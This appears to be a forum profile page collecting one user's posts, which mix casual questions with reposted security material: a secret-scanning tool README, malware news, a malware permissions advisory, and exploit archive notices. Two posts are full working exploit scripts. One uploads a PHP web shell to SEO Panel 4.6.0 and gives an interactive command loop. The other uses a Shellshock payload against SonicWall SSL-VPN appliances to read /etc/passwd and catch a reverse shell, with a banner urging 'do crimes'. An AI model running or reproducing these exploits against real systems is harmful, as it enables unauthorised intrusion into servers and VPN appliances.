Everything posted by Kev
-
Greetings, nation. Is there an Android app, for a phone with the specs Main Camera Dual 13 MP, f/1.9, 28mm (wide), AF 5 MP, f/2.2, 12mm (ultrawide) Features LED flash, panorama, HDR Video 1080p@30/60fps, that lets you see through a 100% opaque window? Danke. Edit: solved, there are free apps of the X-Ray Camera Free v1.0.15 (2011) kind.
-
Something like that, but these are PET bottles and aluminium cans, and yes, I don't have YT Premium. The draft bill on the 50-bani deposit on packaging, contested by stores - Stirileprotv.ro. I was listening to music on YT and heard an ad; I was in another room and didn't have time to look at it.
-
Greetings, citizens! I've known since 2020 that in Jan. '21 recycling machines would be rolled out in the parking lots in the areas where the stores are located (Kaufland, Profi & Penny); Carrefour is 50 km away from me. I've accumulated approximately 1000 energy drink/beer cans plus Fanta Madness (with alcohol) PET bottles; I know you get paid somewhere, or get a discount ticket. There aren't any in the area where I am. Unluckily I don't have YT Premium, and I heard some ad for an app where you get points if you return them; there's no point in travelling 50 km, paying for gas and eating a Chicken McNuggets meal. Does anyone know the app? Cheers!
-
About GitLab Watchman

GitLab Watchman is an application that uses the GitLab API to audit GitLab for sensitive data and credentials exposed internally.

Features

It searches GitLab for internally shared projects and looks at:
- Code
- Commits
- Wiki pages
- Issues
- Merge requests
- Milestones

For the following data:
- GCP keys and service account files
- AWS keys
- Azure keys and service account files
- Google API keys
- Slack API tokens & webhooks
- Private keys (SSH, PGP, any other misc private key)
- Exposed tokens (Bearer tokens, access tokens, client_secret etc.)
- S3 config files
- Tokens for services such as Heroku, PayPal and more
- Passwords in plaintext
- and more

Time based searching

You can run GitLab Watchman to look for results going back as far as:
- 24 hours
- 7 days
- 30 days
- All time

This means after one deep scan, you can schedule GitLab Watchman to run regularly and only return results from your chosen timeframe.

Rules

GitLab Watchman uses custom YAML rules to detect matches in GitLab. They follow this format:

    ---
    filename:
    enabled: #[true|false]
    meta:
      name:
      author:
      date:
      description: #what the search should find#
      severity: #rating out of 100#
    scope: #what to search, any combination of the below#
      - blobs
      - commits
      - milestones
      - wiki_blobs
      - issues
      - merge_requests
    test_cases:
      match_cases:
        - #test case that should match the regex#
      fail_cases:
        - #test case that should not match the regex#
    strings:
      - #search query to use in GitLab#
    pattern: #Regex pattern to filter out false positives#

There are Python tests in the tests dir to ensure rules are formatted properly and that the Regex patterns work. More information about rules, and how you can add your own, is in the file docs/rules.md.

Logging

GitLab Watchman gives the following logging options:
- Log file
- Stdout
- TCP stream

Results are output in JSON format, perfect for ingesting into a SIEM or other log analysis platform. For file and TCP stream logging, configuration options need to be passed via .conf file or environment variable. See the file docs/logging.md for instructions on how to set it up. If no logging option is given, GitLab Watchman defaults to Stdout logging.

Requirements

GitLab versions

GitLab Watchman uses the v4 API, and works with GitLab Enterprise Edition versions:
- 13.0 and above - Yes
- GitLab.com - Yes
- 12.0 - 12.10 - Maybe, untested but if using v4 of the API then it could work

GitLab Licence & Elasticsearch

To search the scopes:
- blobs
- wiki_blobs
- commits

The GitLab instance must have Elasticsearch configured, and be running Enterprise Edition with a minimum GitLab Starter or Bronze Licence.

GitLab personal access token

To run GitLab Watchman, you will need a GitLab personal access token. You can create a personal access token in the GitLab GUI via Settings -> Access Tokens -> Add a personal access token

The token needs permission for the following scopes:
- api

Note: Personal access tokens act on behalf of the user who creates them, so I would suggest you create a token using a service account, otherwise the app will have access to your private repositories.

GitLab URL

You also need to provide the URL of your GitLab instance.

Providing token & URL

GitLab Watchman will first try to get the GitLab token and URL from the environment variables GITLAB_WATCHMAN_TOKEN and GITLAB_WATCHMAN_URL, if this fails they will be taken from .conf file (see below).

.conf file

Configuration options can be passed in a file named watchman.conf which must be stored in your home directory. The file should follow the YAML format, and should look like below:

    gitlab_watchman:
      token: abc123
      url: https://gitlab.example.com
      logging:
        file_logging:
          path:
        json_tcp:
          host:
          port:

GitLab Watchman will look for this file at runtime, and use the configuration options from here. If you are not using the advanced logging features, leave them blank. If you are having issues with your .conf file, run it through a YAML linter. An example file is in docs/example.conf

Note: If you use any other Watchman applications and already have a watchman.conf file, just append the conf data for GitLab Watchman to the existing file.

Installation

Install via pip

    pip install gitlab-watchman

Or via source

Usage

GitLab Watchman will be installed as a global command, use as follows:

    usage: gitlab-watchman [-h] --timeframe {d,w,m,a} --output
                           {file,stdout,stream} [--version] [--all] [--blobs]
                           [--commits] [--wiki-blobs] [--issues] [--merge-requests]
                           [--milestones] [--comments]

    Monitoring GitLab for sensitive data shared publicly

    optional arguments:
      -h, --help            show this help message and exit
      --version             show program's version number and exit
      --all                 Find everything
      --blobs               Search code blobs
      --commits             Search commits
      --wiki-blobs          Search wiki blobs
      --issues              Search issues
      --merge-requests      Search merge requests
      --milestones          Search milestones
      --comments            Search comments

    required arguments:
      --timeframe {d,w,m,a}
                            How far back to search: d = 24 hours w = 7 days, m =
                            30 days, a = all time
      --output {file,stdout,stream}
                            Where to send results

You can run GitLab Watchman to look for everything, and output to default Stdout:

    gitlab-watchman --timeframe a --all

Or arguments can be grouped together to search more granularly. This will look for commits and milestones for the last 30 days, and output the results to a TCP stream:

    gitlab-watchman --timeframe m --commits --milestones --output stream

Other Watchman apps

You may be interested in some of the other apps in the Watchman family:
- Slack Watchman
- GitHub Watchman

License

The source code for this project is released under the GNU General Public Licence. This project is not associated with GitLab.

Download gitlab-watchman-master.zip or git clone https://github.com/PaperMtn/gitlab-watchman.git

Source
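The rule format in the post above pairs each regex with match and fail cases. The following is an added example, not GitLab Watchman's own test code, that checks a rule (shown as an already-parsed dict) against that format; the two sample rules, the AWS key pattern and the use of `re.search` are assumptions of this example.

```python
import re

# Scope names and keys taken from the rule format quoted in the post.
ALLOWED_SCOPES = {"blobs", "commits", "milestones", "wiki_blobs", "issues", "merge_requests"}
TOP_LEVEL_KEYS = ("filename", "enabled", "meta", "scope", "test_cases", "strings", "pattern")
META_KEYS = ("name", "author", "date", "description", "severity")


def validate_rule(rule):
    """Return a list of problems in one parsed rule; an empty list means it passed."""
    problems = [f"missing key: {k}" for k in TOP_LEVEL_KEYS if k not in rule]
    if problems:
        return problems

    if not isinstance(rule["enabled"], bool):
        problems.append("enabled must be true or false")

    meta = rule["meta"] or {}
    problems += [f"missing meta field: {k}" for k in META_KEYS if meta.get(k) in (None, "")]
    severity = meta.get("severity")
    if severity is not None and not (isinstance(severity, int) and 0 <= severity <= 100):
        problems.append(f"severity must be an integer from 0 to 100, got {severity!r}")

    scope = rule["scope"] or []
    if not scope:
        problems.append("scope is empty")
    unknown = sorted(set(scope) - ALLOWED_SCOPES)
    if unknown:
        problems.append(f"unknown scope(s): {', '.join(unknown)}")

    if not rule["strings"]:
        problems.append("strings is empty: no search query would be sent to GitLab")

    try:
        regex = re.compile(rule["pattern"])
    except (re.error, TypeError) as exc:
        return problems + [f"pattern does not compile: {exc}"]

    # Assumption: the pattern is applied with re.search to each search hit.
    cases = rule["test_cases"] or {}
    for text in cases.get("match_cases") or []:
        if not regex.search(text):
            problems.append(f"match_case not matched: {text!r}")
    for text in cases.get("fail_cases") or []:
        if regex.search(text):
            problems.append(f"fail_case unexpectedly matched: {text!r}")
    return problems


# Constructed sample rule (hypothetical file name; key value is AWS's documented example key).
GOOD_RULE = {
    "filename": "aws_access_key.yaml",
    "enabled": True,
    "meta": {"name": "AWS access key ID", "author": "example", "date": "2021-02-02",
             "description": "AWS access key IDs in code and commits", "severity": 90},
    "scope": ["blobs", "commits"],
    "test_cases": {
        "match_cases": ["aws_access_key_id = AKIAIOSFODNN7EXAMPLE"],
        "fail_cases": ["AKIA is only the documented key prefix", "AKIA1234"],
    },
    "strings": ["AKIA"],
    "pattern": r"\bAKIA[0-9A-Z]{16}\b",
}

# Same rule with a pattern that is too loose, a bad severity and a scope that is not in the format.
LOOSE_RULE = dict(
    GOOD_RULE,
    pattern=r"AKIA.*",
    scope=["blobs", "snippets"],
    meta=dict(GOOD_RULE["meta"], severity=150),
)

if __name__ == "__main__":
    for name, rule in (("good", GOOD_RULE), ("loose", LOOSE_RULE)):
        print(name, validate_rule(rule) or "OK")
```

A loose pattern is the costly failure here: it passes every match case and only the fail cases reveal that it would flood the SIEM with false positives.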
-
Or a scam page aimed at the admin. Off-topic: pax, are you still stealing cakes from the greengrocers?
-
SEO Panel version 4.6.0 remote code execution exploit. Original discovery of code execution in this version is attributed to Daniel Monzon and Kiko Andreu in October of 2020.

# Exploit Title: SEO Panel 4.6.0 - Remote Code Execution (2)
# Date: 22 Jan 2021
# Exploit Author: Kr0ff
# Vendor Homepage: https://www.seopanel.org/https://www.kentico.com/
# Software Link: https://www.seopanel.org/spdownload/4.6.0
# Version: 4.6.0
# Tested on: Ubuntu 20.04

#!/usr/bin/env python3

'''
DESCRIPTION:
    - SeoPanel 4.6.0 vulnerable to Remote Code Execution via authenticated file upload

FIXED:
    - ver 4.7.0

AUTHOR:
    - Kr0ff
'''
#https://asciiart.website/index.php?art=animals/bats

try:
    import requests
    import argparse
    import sys
    from termcolor import colored
    from time import sleep
except ImportError as e:
    print(colored("[ERROR]: ", "red"), f"{e}")

def arty():
    artz = """
HAPPY HALLOWEEN !
----------------------------------------------------------
4.6.0 @Kr0ff
----------------------------------------------------------
"""
    print(artz)

#Initialize requests to create a session
r = requests.session()

#Create a login for the user
def login(TARGET, USER, PASS):
    data = {"sec":"login", "red_referer": f"{TARGET}", "userName": f"{USER}", "password": f"{PASS}","login":""}
    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "en-US,en;q=0.5",
               "Accept-Encoding": "gzip, deflate",
               "DNT": "1",
               "Connection": "close",
               "Upgrade-Insecure-Requests": "1"}
    req = r.post(f"{TARGET}/login.php", headers=headers, data=data, verify=False)
    if req.status_code == 200:
        print(colored("[SUCCESS]", "green"), f"Status code for login.php -> {req.status_code}\r\n")
    else:
        print(colored("[FAILURE]", "red"), f"Status code for login.php -> {req.status_code}\r\n")
        print("Please check if you are providing the right path to 'seopanel' or if server is live...")
    get_ch = req.headers.get("Set-Cookie")
    return get_ch

#Upload the webshell to target server
def exploit(TARGET, USER, PASS):
    login(TARGET, USER, PASS)
    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "en-US,en;q=0.5",
               "Accept-Encoding": "gzip, deflate",
               "Referer": TARGET + "/admin-panel.php",
               "Content-Type": "multipart/form-data; boundary=---------------------------193626971803013289998688514",
               "DNT": "1",
               "Connection": "close",
               "Upgrade-Insecure-Requests": "1"}
    #Multipart body for the CSV import form; the "CSV" part carries a .php file name
    payload = "-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"sec\"\r\n\r\nimport\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"userid\"\r\n\r\n1\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"website_csv_file\"; filename=\"bc1ab68651691302e1434959b70cba26.php\"\r\nContent-Type: text/csv\r\n\r\n<?php system($_GET['veiocx']); ?>\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"delimiter\"\r\n\r\n,\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"enclosure\"\r\n\r\n\"\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"escape\"\r\n\r\n\\\r\n-----------------------------193626971803013289998688514--\r\n"
    req0 = r.post(f"{TARGET}/websites.php", headers=headers, data=payload, verify=False)
    if req0.status_code == 200:
        print(colored("[SUCCESS]", "green"), f"Status code for payload upload [websites.php] -> {req0.status_code}\r\n")
    else:
        print(colored("[FAILURE]", "red"), f"Status code for payload upload [websites.php] -> {req0.status_code}\r\n")
        print("Please check if you are providing the right path or if server is live...")
    while(1):
        try:
            p = input("$> ")
            shell_url = TARGET + f"tmp/bc1ab68651691302e1434959b70cba26.php?veiocx={p}"
            control = r.get(shell_url, headers=headers, verify=False)
            if control.status_code == 200:
                print(colored("[SUCCESS]","green"), "Shell uploaded successfully !\r\n\r\n")
                print(control.text)
            else:
                print(colored("[ERROR]","red"), "Shell not uploaded... :(")
                print("Status code ->", colored(control.status_code, "red"))
                sys.exit(0)
        except KeyboardInterrupt:
            #Do self-cleanup on ctrl+c and wait a sec
            cleanup = TARGET + f"tmp/bc1ab68651691302e1434959b70cba26.php?veiocx=rm bc1ab68651691302e1434959b70cba26.php"
            requests.get(cleanup, headers=headers, verify=False)
            sleep(1)
            print(colored("\r\n[ERROR]", "red"), "Exitting ! Self-cleanup done !")
            break

#Initialize parser for arguments
def parse_argz():
    parser = argparse.ArgumentParser(description='SEO Panel 4.6.0 authenticated RCE via file upload')
    parser.add_argument("-t", "--target", help="Target http/s:[IP/HOSTNAME]/seopanel/", type=str)
    parser.add_argument("-u", "--user", help="Username to login as", type=str)
    parser.add_argument("-p", "--passwd", help="Password to authenticate with", type=str)
    #args = parser.parse_args(args=None if sys.argv[1:] else ['--help']) #Show help menu if no arguments provided
    args = parser.parse_args(args=None)
    if not args.target or not args.user or not args.passwd:
        #parser.error() takes a single message string
        parser.error(colored("[WARNING]","yellow") + " Not all arguments provided")
        sys.exit(1)
    else:
        TARGET = str(args.target)
        USER = str(args.user)
        PASS = str(args.passwd)
        exploit(TARGET, USER, PASS)

if __name__ == "__main__":
    try:
        arty()
        parse_argz()
    except Exception as e:
        print(colored("[ERROR]","red"), f"-> {e}")
        sys.exit(1)

Source
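The script above leaves two traces in a web server access log: a POST to websites.php (the CSV import) and then requests for a .php file under the application's tmp/ directory. The following is an added detection example, not part of the original post; the log lines are constructed, and the combined log format and the /seopanel application root are assumptions.

```python
import re

# Apache/nginx "combined" access log line (assumed format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def find_php_in_tmp(lines, app_root="/seopanel"):
    """Report every request for a .php file under <app_root>/tmp/.

    The import feature stores uploaded CSV files there, so nothing in that
    directory should ever be requested as PHP. Each finding also records
    whether the same client had posted to the import endpoint earlier.
    """
    import_url = app_root + "/websites.php"
    tmp_php = re.compile(re.escape(app_root) + r"/tmp/[^/?]+\.php(?:\?|$)", re.IGNORECASE)
    importers = set()   # client addresses that used the CSV import
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue    # not an access-log line
        path = m["path"]
        if m["method"] == "POST" and path.split("?", 1)[0] == import_url:
            importers.add(m["ip"])
        elif tmp_php.match(path):
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": path,
                "status": int(m["status"]),
                "after_import": m["ip"] in importers,
            })
    return findings


def likely_executed(findings):
    """Findings where the file was served (200) to the client that imported it."""
    return [f for f in findings if f["status"] == 200 and f["after_import"]]


# Constructed sample log; addresses are from the documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Feb/2021:10:15:00 +0000] "POST /seopanel/login.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Feb/2021:10:15:01 +0000] "POST /seopanel/websites.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Feb/2021:10:15:03 +0000] "GET /seopanel/tmp/sample_import.php?p=1 HTTP/1.1" 200 33 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [02/Feb/2021:11:02:10 +0000] "POST /seopanel/websites.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [02/Feb/2021:11:02:12 +0000] "GET /seopanel/tmp/report.csv HTTP/1.1" 200 870 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [02/Feb/2021:12:40:44 +0000] "GET /seopanel/tmp/old.php HTTP/1.1" 404 196 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in find_php_in_tmp(SAMPLE_LOG):
        print(hit)
```

The post's header lists 4.7.0 as the fixed version. A web server rule that refuses to execute PHP under the import directory removes the second step on any version.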
-
No, I tried with Additional CSS:

::-moz-selection { background-color: #FA0000; color: #fff; }
::selection { background-color: #FA0000; color: #fff; }

Result: I just want the text to be <strong & red>. Edit: it shows up on all pages when I select text, e.g. titles: "Cookies, Service Providers" etc...
-
[wpautoterms company_name] and [wpautoterms site_name] should be bold.
-
YTT TECH - 11 arduino vids YTT Tech exists to organize, curate, and surface the wealth of instructional content on YouTube. To be a place to discover and explore new skills and tools. We've only scratched the surface thus far, there's a ton of great content that hasn't been covered yet. If you know of something missing, it's quick and easy to sign up and start submitting videos! Here is a short video demonstrating some of the features and ideas behind the project. If there's something you'd like to see, let us know! You can reach out at team@ytt-tech.com or via the form below. - James URL: https://www.ytt-tech.com/electronics/arduino Source: https://james.js.org
-
Hi, on a WordPress page I want to change the colour/font of a few pieces of text. Code: Last updated: [wpautoterms last_updated_date] [wpautoterms company_name] ("us", "we", or "our") operates the [wpautoterms site_name] website (the "Service"). The theme in question doesn't give me the Changing Font Styles in Block Editor option. Thanks in advance.
-
Free Bitcoin? Don’t believe it.

Those of us riding the Bitcoin (BTC) wave have watched interest in the cryptocurrency rise especially as the price of a single coin has now reached over $37,000. Bitcoin, Ethereum (ETH), and now Dogecoin (DOGE) -- thanks to a few tweets by Elon Musk -- have all come onto the radar of would-be traders, but as with every investment, scam artists are seeking means to cash in.

Cryptocurrency is certainly not immune to scams or other threats. Cryptocurrency exchanges hit with cyberattacks can end up losing trader funds; exit scams still occur, and regulators are constantly battling fraud. We're unlikely to see any end of crypto-related scams anytime soon, and in a new warning posted by Kaspersky, a new scheme is now targeting users of Discord.

Discord is a messaging and voice chat service that caters to an estimated 300 million users, having branched out from a gamer-heavy community to general use for clubs and for friends to stay in touch.

According to Kaspersky researcher Mikhail Sytnik, scam artists are now entering Discord servers and are sending private messages to users that appear to be from new, up-and-coming cryptocurrency exchanges. As new projects and ones that want to "support traders in difficult times," these 'exchanges' try to attract users with promises of free cryptocurrency. And, of course, the recipient is the lucky one chosen for free BTC or ETH.

Naturally, such a scam doesn't attempt to attract users with a paltry offering; instead, thousands of dollars' worth of cryptocurrency is being awarded. Lucky you. Each message contains instructions and a code for accepting the "gift," Kaspersky notes, as well as a link to register on the fake exchange.

As cryptocurrency wallets are now a top target for threat actors, the websites will also offer "two-factor authentication" and "phishing protection" options to try and appear legitimate.

Victims going through the registration process are then lured to provide a substantial personal profile, including contact details, photo ID, a selfie, and a signature. While these checks are now common on legitimate cryptocurrency trading posts, this information can be packaged up and sold to other cybercriminals, or could potentially be used in identity theft.

In the final step of this particular scheme, once the prize 'code' is submitted and accepted, the scammers require a small "top-up" in either BTC, ETH, or USD to process the gift. Should a victim hand over their cash, of course, it's gone for good.

Fake exchanges are only one attack vector used by scam artists in the cryptocurrency sector -- Initial Coin Offerings (ICOs), too, are constantly abused. In January, a resident of San Francisco was jailed for six months after defrauding investors of cryptocurrency worth an estimated $20 million by pretending to be an ICO consultant. He has been ordered to pay $4.4 million in restitution.

Via zdnet.com
-
VVV is a local developer environment, mainly aimed at WordPress developers. It uses Vagrant and VirtualBox, and can be used to build sites, and contribute to WordPress.

How To Use

To use it, download and install Vagrant and VirtualBox. Then, clone this repository and run:

    vagrant plugin install vagrant-goodhosts --local
    vagrant up --provision

When it's done, visit http://vvv.test. The online documentation contains more detailed installation instructions.

Web: https://varyingvagrantvagrants.org/

Contributing: Contributions are more than welcome. Please see our current contributing guidelines. Thanks!

Minimum System requirements

For system requirements, please read the system requirements documentation here

Software included

For a comprehensive list, please see the list of installed packages.

Download VVV-develop.zip or git clone https://github.com/Varying-Vagrant-Vagrants/VVV.git

Source
-
Backdoor.Win32.RemoteManipulator.brr malware suffers from an insecure permissions vulnerability.

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/717f316391b6a7b97fa160b0a627a413.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.RemoteManipulator.brr
Vulnerability: Insecure Permissions EoP
Description: This malware creates a dir named "eaKVB87.tmp" under c:\ and grants change (C) permissions to authenticated users group. This can result in EoP as any authenticated user can modify its dir.
Type: PE32
MD5: 717f316391b6a7b97fa160b0a627a413
Vuln ID: MVID-2021-0067
Dropped files: citoCavb.vbs, N0731337.bak, taskhosteo.exe, vp8encoder.dll
Disclosure: 02/02/2021

Exploit/PoC:

C:\>cacls C:\eaKVB87.tmp
C:\eaKVB87.tmp BUILTIN\Administrators:(OI)(CI)(ID)F
               NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
               BUILTIN\Users:(OI)(CI)(ID)R
               NT AUTHORITY\Authenticated Users:(ID)C
               NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

C:\>cacls C:\eaKVB87.tmp\taskhosteo.exe
C:\eaKVB87.tmp\taskhosteo.exe BUILTIN\Administrators:(ID)F
                              NT AUTHORITY\SYSTEM:(ID)F
                              BUILTIN\Users:(ID)R
                              NT AUTHORITY\Authenticated Users:(ID)C

Directory of c:\eaKVB87.tmp

03/27/2017  01:38 AM        42,320 citoCavb.vbs
01/27/2021  08:36 PM             0 N0731337.bak
03/21/2017  08:11 PM     3,968,512 taskhosteo.exe
09/01/2016  07:44 AM     1,639,336 vp8encoder.dll

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source malvuln.com
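The cacls listing in the advisory above can be audited mechanically. The following is an added example, not part of the advisory, that parses cacls output and reports write-capable entries held by broad groups; the list of groups treated as broad and the function names are assumptions of this example, and the sample text is the directory listing quoted above.

```python
import re

# One ACE as printed by cacls: PRINCIPAL:(FLAG)(FLAG)...RIGHT
ACE_RE = re.compile(
    r"(?P<who>(?:BUILTIN|NT AUTHORITY)\\[A-Za-z ]+|Everyone):"
    r"(?P<flags>(?:\([A-Z]+\))*)(?P<right>[NRWCF])\s*$"
)

# Assumption: principals that cover every ordinary local user.
BROAD_GROUPS = {
    "Everyone",
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}
# cacls rights that allow modification: W(rite), C(hange), F(ull control).
WRITE_RIGHTS = {"W", "C", "F"}


def parse_cacls(text):
    """Return one dict per ACE found in cacls output."""
    aces = []
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if m:
            aces.append({
                "who": m["who"],
                "flags": re.findall(r"\(([A-Z]+)\)", m["flags"]),
                "right": m["right"],
            })
    return aces


def writable_by_broad_groups(text):
    """ACEs that let a broad group modify the object or its children."""
    findings = []
    for ace in parse_cacls(text):
        if ace["who"] in BROAD_GROUPS and ace["right"] in WRITE_RIGHTS:
            findings.append({
                "who": ace["who"],
                "right": ace["right"],
                # (ID): the entry comes from the parent, not set on the object itself
                "inherited": "ID" in ace["flags"],
                # (IO): inherit-only, applies to children but not to this object
                "scope": "children only" if "IO" in ace["flags"] else "this object",
            })
    return findings


# cacls output for the directory, as quoted in the advisory.
SAMPLE = r"""C:\eaKVB87.tmp BUILTIN\Administrators:(OI)(CI)(ID)F
               NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
               BUILTIN\Users:(OI)(CI)(ID)R
               NT AUTHORITY\Authenticated Users:(ID)C
               NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
"""

if __name__ == "__main__":
    for finding in writable_by_broad_groups(SAMPLE):
        print(finding)
```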
-
DATO.RSS

The best RSS Search Engine experience you can find.

DATO.RSS - Search Engine: Quickly search through the millions of available RSS feeds.

DATO.RSS - API: Turns feed data into an awesome API. The API simplifies how you handle RSS, Atom, or JSON feeds. You can add and keep track of your favourite feed data with a simple, fast and clean REST API. All entries are enriched by Machine Learning and Semantic engines.

LIVE

https://datorss.com

Example

    curl 'https://datorss.com/api/searches?q=news' | json_pp

    {
       "data": [
          {
             "id": "86b0f829-e300-4eef-82e1-82f34d03aff6",
             "type": "entry",
             "attributes": {
                "title": "\"Pandemic, Infodemic\": 2 Cartoon Characters Battling Fake News In Assam",
                "url": "https://www.ndtv.com/india-news/coronavirus-pandemic-infodemic-2-cartoon-characters-battling-fake-news-in-assam-2222333",
                "published_at": 1588448805,
                "body": "An English daily in Assam's Guwahati has been publishing a cartoon strip to tackle the fake news related to the coronavirus pandemic. The two central characters- \"Pandemic and Infodemic\"- are being...<img src=\"http://feeds.feedburner.com/~r/NDTV-LatestNews/~4/lEmH201Q8jI\" height=\"1\" width=\"1\" alt=\"\"/>",
                "text": "An English daily in Assam's Guwahati has been publishing a cartoon strip to tackle the fake news related to the coronavirus pandemic. The two central characters- \"Pandemic and Infodemic\"- are being...",
                "categories": [
                   "all india"
                ],
                "sentiment": null,
                "parent": {
                   "id": "c97bdae6-b5d1-4966-b9f3-615e29d4d47d",
                   "title": "NDTV News - Special",
                   "url": "feed:http://feeds.feedburner.com/NDTV-LatestNews",
                   "rank": 99
                },
                "tags": []
             },
             "relationships": {
                "feed": {
                   "data": {
                      "id": "c97bdae6-b5d1-4966-b9f3-615e29d4d47d",
                      "type": "feed"
                   }
                }
             }
          },
       ]
    }

Wiki

All documentation is in the Wiki section. Feel free to make it better, of course. https://github.com/davidesantangelo/dato.rss/wiki

Download dato.rss-main.zip or git clone https://github.com/davidesantangelo/dato.rss.git

Source
-
Kobalos’ codebase is tiny, but its impact is not. A small but complex malware variant is targeting supercomputers worldwide. Reverse engineered by ESET and described in a blog post on Tuesday, the malware has been traced back to attacks against supercomputers used by a large Asian Internet Service Provider (ISP), a US endpoint security vendor, and a number of privately-held servers, among other targets. The cybersecurity team has named the malware Kobalos in deference to the kobalos, a small creature in Greek mythology believed to cause mischief. Kobalos is unusual for a number of reasons. The malware's codebase is tiny but is sophisticated enough to impact at least Linux, BSD, and Solaris operating systems. ESET suspects it may possibly be compatible with attacks against AIX and Microsoft Windows machines, too. While working with the CERN Computer Security Team, ESET realized the "unique, multiplatform" malware was targeting high performance computer (HPC) clusters. In some cases of infection, it appears that 'sidekick' malware hijacks SSH server connections to steal credentials that are then used to obtain access to HPC clusters and deploy Kobalos. Kobalos is, in essence, a backdoor. Once the malware has landed on a supercomputer, the code buries itself in an OpenSSH server executable and will trigger the backdoor if a call is made through a specific TCP source port. Other variants act as middlemen for traditional command-and-control (C2) server connections. Kobalos grants its operators remote access to file systems, allows them to spawn terminal sessions, and also acts as connection points to other servers infected with the malware. ESET says that a unique facet of Kobalos is its ability to turn any compromised server into a C2 through a single command. 
The malware was a challenge to analyze as all of its code is held in a "single function that recursively calls itself to perform subtasks," ESET says, adding that all strings are encrypted as a further barrier to reverse engineering. As of now, more research needs to be conducted in the malware -- and who may be responsible for its development. Via zdnet.com
-
2017 - MU, LOL, etc... Trivia, comrades, since you're old (you'll improve your general knowledge)
-
Ha, I was in a hurry, I only just noticed (202012-exploits.tgz) 2012.tgz Resources: https://github.com/hackerhouse-opensource/exploits
-
This archive contains all of the 231 exploits added to Packet Storm in January, 2021.

Download 202101-exploits.tgz (2.6 MB) Source
-
SonicWall SSL-VPN Exploit, as used by Phineas Fisher to hack Cayman Trust Bank and Hacking Team. Unauthenticated, gives you a "nobody" shell. Getting root is an exercise for the user.

For details see: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

#!/usr/bin/python
# coding: utf-8
# Author: Darren Martyn
# Credit: Phineas Fisher
# Notes:
# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team
# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
# a trivial reverse shell using /dev/tcp.
# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
# implementing that is left as an exercise for the reader. I've seen a few approaches, and
# would be interested in seeing yours.
# There is another LPE that works only on some models which I also have removed from this.
# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
import requests
import sys
import telnetlib
import socket
from threading import Thread
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import time

def banner():
    print """
SonicWall SSL-VPN Appliance Remote Exploit
Public Release (Jan 2021). Author: Darren Martyn. Credit
goes to Phineas Fisher for this. Stay inside, do crimes.
    """

def handler(lp): # handler borrowed from Stephen Seeley.
    print "(+) starting handler on port %d" %(lp)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print "(+) connection from %s" %(addr[0])
    t.sock = conn
    print "(+) pop thy shell!"
    t.interact()

def execute_command(target, command):
    url = target + "/cgi-bin/jarrewrite.sh"
    headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
    r = requests.get(url=url, headers=headers, verify=False)
    return r.text

def check_exploitable(target):
    print "(+) Testing %s for pwnability..." %(target)
    output = execute_command(target=target, command="cat /etc/passwd")
    if "root:" in output:
        print "(*) We can continue, time to wreck this shit."
        return True
    else:
        return False

